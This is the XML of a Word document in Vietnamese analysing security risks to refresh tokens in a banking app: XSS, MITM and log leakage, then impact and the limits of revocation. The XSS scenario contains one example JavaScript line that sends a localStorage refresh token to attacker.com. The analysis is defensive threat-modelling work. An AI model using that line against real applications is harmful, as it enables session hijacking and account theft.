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35396" w14:textId="77777777" w:rsidR="00F65931" w:rsidRPr="00F65931" w:rsidRDefault="00F65931" w:rsidP="00F65931">
      <w:pPr>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00F65931">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>PHẦN 1: PHÂN TÍCH LOGIC &amp; ĐÁNH GIÁ RỦI RO</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="779A6347" w14:textId="77777777" w:rsidR="00F65931" w:rsidRPr="00F65931" w:rsidRDefault="00F65931" w:rsidP="00F65931">
      <w:pPr>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00F65931">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>1. Kịch bản tấn công (Attack Scenarios)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="78DF8710" w14:textId="77777777" w:rsidR="00F65931" w:rsidRPr="00F65931" w:rsidRDefault="00F65931" w:rsidP="00F65931">
      <w:r w:rsidRPr="00F65931">
        <w:t>Do Refresh Token có tuổi thọ dài (long-lived), chúng là mục tiêu tối thượng của hacker. Dưới đây là 3 kịch bản tấn công phổ biến và nguy hiểm nhất:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="324D5CC9" w14:textId="77777777" w:rsidR="00F65931" w:rsidRPr="00F65931" w:rsidRDefault="00F65931" w:rsidP="00F65931">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="00F65931">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>Kịch bản 1: Tấn công Cross-Site Scripting (XSS) chiếm đoạt Storage</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5CED5B1E" w14:textId="77777777" w:rsidR="00F65931" w:rsidRPr="00F65931" w:rsidRDefault="00F65931" w:rsidP="00F65931">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="1"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="00F65931">
        <w:rPr>
          <w:i/>
          <w:iCs/>
        </w:rPr>
        <w:t>Cơ chế:</w:t>
      </w:r>
      <w:r w:rsidRPr="00F65931">
        <w:t xml:space="preserve"> Nếu ứng dụng Web/Single Page Application (SPA) lưu trữ Refresh Token trong LocalStorage hoặc SessionStorage, các token này hoàn toàn có thể bị truy cập thông qua JavaScript. Kẻ tấn công khai thác lỗ hổng XSS (qua các ô nhập liệu không được filter, hoặc các thư viện npm bên thứ ba có mã độc) để thực thi một đoạn script độc hại: fetch('https://attacker.com/steal?token=' + localStorage.getItem('refresh_token')).</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="18CD6E69" w14:textId="77777777" w:rsidR="00F65931" w:rsidRPr="00F65931" w:rsidRDefault="00F65931" w:rsidP="00F65931">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="00F65931">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>Kịch bản 2: Tấn công Man-in-the-Middle (MITM) do cấu hình Transport kém</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1C1163D3" w14:textId="77777777" w:rsidR="00F65931" w:rsidRPr="00F65931" w:rsidRDefault="00F65931" w:rsidP="00F65931">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="1"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="00F65931">
        <w:rPr>
          <w:i/>
          <w:iCs/>
        </w:rPr>
        <w:t>Cơ chế:</w:t>
      </w:r>
      <w:r w:rsidRPr="00F65931">
        <w:t xml:space="preserve"> Mặc dù hệ thống có sử dụng HTTPS, nhưng nếu cấu hình TLS bị lỗi thời (ví dụ: hỗ trợ TLS 1.0, 1.1), hoặc ứng dụng không bật thuộc tính Secure cho cookie, kẻ tấn công trong cùng mạng Wi-Fi công cộng có thể đánh chặn gói tin (Sniffing). Đối với ứng dụng Mobile, nếu không triển khai </w:t>
      </w:r>
      <w:r w:rsidRPr="00F65931">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>SSL Pinning</w:t>
      </w:r>
      <w:r w:rsidRPr="00F65931">
        <w:t>, kẻ tấn công có thể cài đặt một chứng thư số giả lập (Root CA) trên thiết bị người dùng để giải mã và đánh cắp Refresh Token khi nó được gửi lên Server.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="622F5989" w14:textId="77777777" w:rsidR="00F65931" w:rsidRPr="00F65931" w:rsidRDefault="00F65931" w:rsidP="00F65931">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="00F65931">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>Kịch bản 3: Đánh cắp thông qua Mã độc/Log hoành hành tại Client hoặc Server Side</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4D8ACC56" w14:textId="77777777" w:rsidR="00F65931" w:rsidRPr="00F65931" w:rsidRDefault="00F65931" w:rsidP="00F65931">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="1"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="00F65931">
        <w:rPr>
          <w:i/>
          <w:iCs/>
        </w:rPr>
        <w:t>Cơ chế:</w:t>
      </w:r>
      <w:r w:rsidRPr="00F65931">
        <w:t xml:space="preserve"> Ở phía Client (Mobile/PC), mã độc (Malware, Trojan) có thể quét phân vùng lưu trữ ứng dụng công khai để lấy cắp dữ liệu. Ở phía Server, nếu lập trình viên vô tình ghi đè toàn bộ request body/header vào hệ thống Log (Log Injection/Leakage) như ELK hoặc Splunk để debug, kẻ tấn công chiếm được quyền đọc Log hệ thống sẽ sở hữu toàn bộ các Refresh Token hợp lệ của khách hàng.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="60CDEAD6" w14:textId="77777777" w:rsidR="00F65931" w:rsidRPr="00F65931" w:rsidRDefault="00F65931" w:rsidP="00F65931">
      <w:pPr>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00F65931">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>2. Hậu quả (Impact Analysis)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="56B70DA6" w14:textId="77777777" w:rsidR="00F65931" w:rsidRPr="00F65931" w:rsidRDefault="00F65931" w:rsidP="00F65931">
      <w:r w:rsidRPr="00F65931">
        <w:t>Khi một Refresh Token của ứng dụng ngân hàng bị lộ, hậu quả để lại là cực kỳ nghiêm trọng:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="47938773" w14:textId="77777777" w:rsidR="00F65931" w:rsidRPr="00F65931" w:rsidRDefault="00F65931" w:rsidP="00F65931">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="2"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="00F65931">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>Duy trì quyền truy cập vô hạn (Persistence Access):</w:t>
      </w:r>
      <w:r w:rsidRPr="00F65931">
        <w:t xml:space="preserve"> Kẻ tấn công sử dụng Refresh Token bị lộ để liên tục yêu cầu các Access Token mới mà không cần biết mật khẩu hay mã OTP của nạn nhân.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="01C02112" w14:textId="77777777" w:rsidR="00F65931" w:rsidRPr="00F65931" w:rsidRDefault="00F65931" w:rsidP="00F65931">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="2"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="00F65931">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:t>Vượt qua cơ chế MFA (Multi-Factor Authentication Bypass):</w:t>
      </w:r>
      <w:r w:rsidRPr="00F65931">
        <w:t xml:space="preserve"> OTP và sinh trắc học thường chỉ yêu cầu ở bước </w:t>
      </w:r>
      <w:r w:rsidRPr="00F65931">
        <w:rPr>
          <w:i/>
          <w:iCs/>
        </w:rPr>
        <w:t>Đăng nhập</w:t>
      </w:r>
      <w:r w:rsidRPr="00F65931">
        <w:t>. Khi đã có Refresh Token, kẻ tấn công bỏ qua hoàn toàn các bước xác thực mạnh này để duy trì phiên.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="42C15E4B" w14:textId="77777777" w:rsidR="00F65931" w:rsidRPr="00F65931" w:rsidRDefault="00F65931" w:rsidP="00F65931">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="2"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="00F65931">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>Thực hiện giao dịch bất hợp pháp:</w:t>
      </w:r>
      <w:r w:rsidRPr="00F65931">
        <w:t xml:space="preserve"> Kẻ tấn công có thể âm thầm thu thập thông tin tài khoản, lịch sử giao dịch, số dư, và đợi thời cơ (hoặc kết hợp lỗi phân quyền khác) để thực hiện hành vi chiếm đoạt tài sản, hủy hoại uy tín của ngân hàng.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0F4B4A47" w14:textId="77777777" w:rsidR="00F65931" w:rsidRPr="00F65931" w:rsidRDefault="00F65931" w:rsidP="00F65931">
      <w:pPr>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00F65931">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>3. Đánh giá cơ chế Revoke Token hiện tại và Hạn chế</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="566D46E8" w14:textId="77777777" w:rsidR="00F65931" w:rsidRPr="00F65931" w:rsidRDefault="00F65931" w:rsidP="00F65931">
      <w:r w:rsidRPr="00F65931">
        <w:t>Cơ chế Revoke truyền thống thường hoạt động theo cách: Khi người dùng bấm "Đăng xuất" hoặc Hệ thống phát hiện rủi ro, Server sẽ đánh dấu Token đó là revoked = true trong Database hoặc xóa khỏi Redis Blacklist.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="39460634" w14:textId="77777777" w:rsidR="00F65931" w:rsidRPr="00F65931" w:rsidRDefault="00F65931" w:rsidP="00F65931">
      <w:r w:rsidRPr="00F65931">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>Hạn chế chết người trong môi trường thực tế:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4E68BD26" w14:textId="77777777" w:rsidR="00F65931" w:rsidRPr="00F65931" w:rsidRDefault="00F65931" w:rsidP="00F65931">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="3"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="00F65931">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>Cuộc đua thời gian (Race Condition / Token Abuse):</w:t>
      </w:r>
      <w:r w:rsidRPr="00F65931">
        <w:t xml:space="preserve"> Nếu kẻ tấn công lấy được Refresh Token và sử dụng nó </w:t>
      </w:r>
      <w:r w:rsidRPr="00F65931">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>trước</w:t>
      </w:r>
      <w:r w:rsidRPr="00F65931">
        <w:t xml:space="preserve"> khi nạn nhân kịp phát hiện để bấm "Đăng xuất" (Revoke), hệ thống sẽ cấp cho kẻ tấn công một cặp Access Token + Refresh Token mới (nếu áp dụng cơ chế quay vòng) hoặc kẻ tấn công tiếp tục giữ Refresh Token cũ hợp lệ. Lúc này, việc Revoke token cũ trở nên vô nghĩa vì kẻ tấn công đã chuyển sang một "vòng đời" mới.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="232D46DA" w14:textId="77777777" w:rsidR="00F65931" w:rsidRPr="00F65931" w:rsidRDefault="00F65931" w:rsidP="00F65931">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="3"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="00F65931">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>Hạn chế của Stateless JWT:</w:t>
      </w:r>
      <w:r w:rsidRPr="00F65931">
        <w:t xml:space="preserve"> Nếu Refresh Token được thiết kế theo dạng tự đóng gói (Stateless JWT) và Server không lưu trạng thái (để giảm tải DB), Server không thể thu hồi token trước thời hạn hết hạn (TTL) của nó một cách chủ động, trừ khi phải duy trì một danh sách đen (Blacklist) tập trung – điều này vô tình phá vỡ kiến trúc Stateless.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="006EF7DF" w14:textId="77777777" w:rsidR="00CA1066" w:rsidRDefault="00CA1066"/>
    <w:sectPr w:rsidR="00CA10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2746"/>
    <w:multiLevelType w:val="multilevel"/>
    <w:tmpl w:val="B9769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D37CAE"/>
    <w:multiLevelType w:val="multilevel"/>
    <w:tmpl w:val="D35E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8F2A3F"/>
    <w:multiLevelType w:val="multilevel"/>
    <w:tmpl w:val="E7B2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167463">
    <w:abstractNumId w:val="0"/>
  </w:num>
  <w:num w:numId="2" w16cid:durableId="630479826">
    <w:abstractNumId w:val="2"/>
  </w:num>
  <w:num w:numId="3" w16cid:durableId="18103245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E22"/>
    <w:rsid w:val="00275E22"/>
    <w:rsid w:val="00AF746B"/>
    <w:rsid w:val="00CA1066"/>
    <w:rsid w:val="00D25E8F"/>
    <w:rsid w:val="00F6593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7D10D6-0D90-4607-BDE3-A5F96CD40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E2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75E2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75E2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75E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E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E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E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E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E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E2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75E2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75E2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75E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E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E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E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E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E22"/>
    <w:rPr>
      <w:rFonts w:eastAsiaTheme="majorEastAsia" w:cstheme="majorBidi"/>
      <w:color w:val="272727" w:themeColor="text1" w:themeTint="D8"/>
    </w:rPr>
  </w:style>
  <w:style w:type="paragraph" w:styleId="Title">
    <w:name w:val="Title"/>
    <w:basedOn w:val="Normal"/>
    <w:next w:val="Normal"/>
    <w:link w:val="TitleChar"/>
    <w:uiPriority w:val="10"/>
    <w:qFormat/>
    <w:rsid w:val="00275E2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75E2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75E2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75E2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75E22"/>
    <w:pPr>
      <w:spacing w:before="160"/>
      <w:jc w:val="center"/>
    </w:pPr>
    <w:rPr>
      <w:i/>
      <w:iCs/>
      <w:color w:val="404040" w:themeColor="text1" w:themeTint="BF"/>
    </w:rPr>
  </w:style>
  <w:style w:type="character" w:customStyle="1" w:styleId="QuoteChar">
    <w:name w:val="Quote Char"/>
    <w:basedOn w:val="DefaultParagraphFont"/>
    <w:link w:val="Quote"/>
    <w:uiPriority w:val="29"/>
    <w:rsid w:val="00275E22"/>
    <w:rPr>
      <w:i/>
      <w:iCs/>
      <w:color w:val="404040" w:themeColor="text1" w:themeTint="BF"/>
    </w:rPr>
  </w:style>
  <w:style w:type="paragraph" w:styleId="ListParagraph">
    <w:name w:val="List Paragraph"/>
    <w:basedOn w:val="Normal"/>
    <w:uiPriority w:val="34"/>
    <w:qFormat/>
    <w:rsid w:val="00275E22"/>
    <w:pPr>
      <w:ind w:left="720"/>
      <w:contextualSpacing/>
    </w:pPr>
  </w:style>
  <w:style w:type="character" w:styleId="IntenseEmphasis">
    <w:name w:val="Intense Emphasis"/>
    <w:basedOn w:val="DefaultParagraphFont"/>
    <w:uiPriority w:val="21"/>
    <w:qFormat/>
    <w:rsid w:val="00275E22"/>
    <w:rPr>
      <w:i/>
      <w:iCs/>
      <w:color w:val="0F4761" w:themeColor="accent1" w:themeShade="BF"/>
    </w:rPr>
  </w:style>
  <w:style w:type="paragraph" w:styleId="IntenseQuote">
    <w:name w:val="Intense Quote"/>
    <w:basedOn w:val="Normal"/>
    <w:next w:val="Normal"/>
    <w:link w:val="IntenseQuoteChar"/>
    <w:uiPriority w:val="30"/>
    <w:qFormat/>
    <w:rsid w:val="00275E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E22"/>
    <w:rPr>
      <w:i/>
      <w:iCs/>
      <w:color w:val="0F4761" w:themeColor="accent1" w:themeShade="BF"/>
    </w:rPr>
  </w:style>
  <w:style w:type="character" w:styleId="IntenseReference">
    <w:name w:val="Intense Reference"/>
    <w:basedOn w:val="DefaultParagraphFont"/>
    <w:uiPriority w:val="32"/>
    <w:qFormat/>
    <w:rsid w:val="00275E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527</Words>
  <Characters>3008</Characters>
  <Application>Microsoft Office Word</Application>
  <DocSecurity>0</DocSecurity>
  <Lines>25</Lines>
  <Paragraphs>7</Paragraphs>
  <ScaleCrop>false</ScaleCrop>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Anh Nguyễn</dc:creator>
  <cp:keywords/>
  <dc:description/>
  <cp:lastModifiedBy>Quang Anh Nguyễn</cp:lastModifiedBy>
  <cp:revision>2</cp:revision>
  <dcterms:created xsi:type="dcterms:W3CDTF">2026-06-23T10:33:00Z</dcterms:created>
  <dcterms:modified xsi:type="dcterms:W3CDTF">2026-06-23T10:33:00Z</dcterms:modified>
</cp:coreProperties>
</file>